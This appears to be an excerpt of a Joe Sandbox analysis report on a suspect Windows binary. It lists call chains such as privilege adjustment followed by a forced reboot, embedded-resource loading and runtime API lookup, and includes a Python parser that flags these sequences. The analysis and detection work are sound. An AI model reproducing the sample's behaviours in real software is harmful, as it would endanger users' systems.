                                                                                            • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                            • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                            • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                            • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                            • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                            • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                            • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                            • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                            • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                            APIs
                                                                                            • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrev
                                                                                            • String ID:
                                                                                            • API String ID: 122130370-0
                                                                                            • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                            • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                            • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                            • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                            • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                            • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                            • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                            • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                            • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                            • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                            • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                            • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                            • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                            • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                            • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 107509674-3733053543
                                                                                            • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                            • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                            • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                            • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                            • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                            • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                            • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                            • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                            • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                            • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                            APIs
                                                                                            • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: SystemTime
                                                                                            • String ID:
                                                                                            • API String ID: 2656138-0
                                                                                            • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                            • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                            • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                            • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                            APIs
                                                                                            • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Version
                                                                                            • String ID:
                                                                                            • API String ID: 1889659487-0
                                                                                            • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                            • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                            • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                            • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                            • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                            • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                            • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                            • API String ID: 4190037839-2401316094
                                                                                            • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                            • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                            • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                            • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
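The three call listings above (the SeShutdownPrivilege chain ending in ExitWindowsEx, the FindResourceA/LoadResource/LockResource chain, and the GetModuleHandleA/GetProcAddress lookup of GetUserDefaultUILanguage) are the kind of API sequence an analyst wants to pull out of a report like this one mechanically rather than by eye. The Python below is an added example and not Joe Sandbox's own code: it parses the "• API.MODULE(args), ref: addr" lines in the form they take on this page, groups them per function at each "APIs" heading, matches ordered API subsequences inside one function, and decodes the uFlags argument of ExitWindowsEx (00000002 is EWX_REBOOT). The pattern labels are the example's own, and the sample listing is constructed from the three records above with the longest argument lists shortened. The arguments Joe Sandbox prints are stack snapshots, so "?" and return addresses appear among them and the decoder skips values it cannot parse.

```python
"""Parse a Joe Sandbox 'APIs' listing and flag call sequences (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# A call line reads "• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3", optionally
# prefixed by "Part of subcall function 0040520C:".  The argument list is a stack snapshot:
# unknown values show as "?" and trailing entries are often return addresses.
_API_RE = re.compile(
    r"""(?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-F]{8}):\s*)?
        (?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Z0-9_]+)
        \((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})""", re.VERBOSE)

# Ordered subsequences of one function's calls (intervening calls such as GetLastError or
# SizeofResource do not break a match).  Labels are this example's own, not Joe Sandbox names.
PATTERNS: Dict[str, List[str]] = {
    "reboot via SeShutdownPrivilege": ["OpenProcessToken", "LookupPrivilegeValueA",
                                       "AdjustTokenPrivileges", "ExitWindowsEx"],
    "embedded resource read": ["FindResourceA", "LoadResource", "LockResource"],
    "runtime API resolution": ["GetModuleHandleA", "GetProcAddress"],
}
_EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
              0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}  # winuser.h uFlags bits; 0 is EWX_LOGOFF

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                # address of the call site
    subcall: Optional[int]  # callee address when attributed to a subcall

def parse_listing(text: str) -> List[List[ApiCall]]:
    """Split at each 'APIs' heading; non-call lines (Strings, hashes ...) are ignored."""
    functions: List[List[ApiCall]] = []
    current: List[ApiCall] = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            functions.append(current)
            current = []
            continue
        m = _API_RE.search(line)
        if m:
            arg_text = m.group("args").strip()
            current.append(ApiCall(
                api=m.group("api"), module=m.group("module"),
                args=[a.strip() for a in arg_text.split(",")] if arg_text else [],
                ref=int(m.group("ref"), 16),
                subcall=int(m.group("sub"), 16) if m.group("sub") else None))
    functions.append(current)
    return [f for f in functions if f]

def matches_in_order(names: List[str], pattern: List[str]) -> bool:
    """True if every name in `pattern` occurs in `names`, in that order."""
    it = iter(names)
    return all(any(n == wanted for n in it) for wanted in pattern)

def flag_sequences(calls: List[ApiCall]) -> List[str]:
    return sorted(label for label, pat in PATTERNS.items()
                  if matches_in_order([c.api for c in calls], pat))

def decode_exit_windows_flags(calls: List[ApiCall]) -> List[str]:
    """EWX_* names for uFlags of the first ExitWindowsEx call whose value is known."""
    for c in calls:
        if c.api == "ExitWindowsEx" and c.args:
            try:
                flags = int(c.args[0], 16)
            except ValueError:  # "?" in the snapshot
                continue
            return [n for bit, n in sorted(_EWX_FLAGS.items()) if flags & bit] or ["EWX_LOGOFF"]
    return []

def flag_report(text: str) -> Dict[str, List[str]]:
    """Map the first call-site address of each flagged function to its labels."""
    out: Dict[str, List[str]] = {}
    for calls in parse_listing(text):
        labels = flag_sequences(calls)
        if labels:
            out[f"{calls[0].ref:08X}"] = labels
    return out

# Constructed input: three listings from this report, longest argument lists shortened.
SAMPLE_LISTING = """\
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
APIs
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
• SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3), ref: 00409C51
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3), ref: 00409C63
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3), ref: 00409C74
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129), ref: 0040704D
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
"""
```

The whole disassembly section of a report can be passed to flag_report unchanged, since every line that is not an "APIs" heading or a call line is dropped by the parser; flag_report(SAMPLE_LISTING) yields the three call-site addresses 00409457, 00409C3E and 0040704D with their labels. Matching is intentionally subsequence-based: requiring adjacent calls would miss the reboot chain here because GetLastError sits between AdjustTokenPrivileges and ExitWindowsEx.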
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                            • String ID:
                                                                                            • API String ID: 1694776339-0
                                                                                            • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                            • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                            • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                            • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                              • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                              • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                            • API String ID: 1044490935-665933166
                                                                                            • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
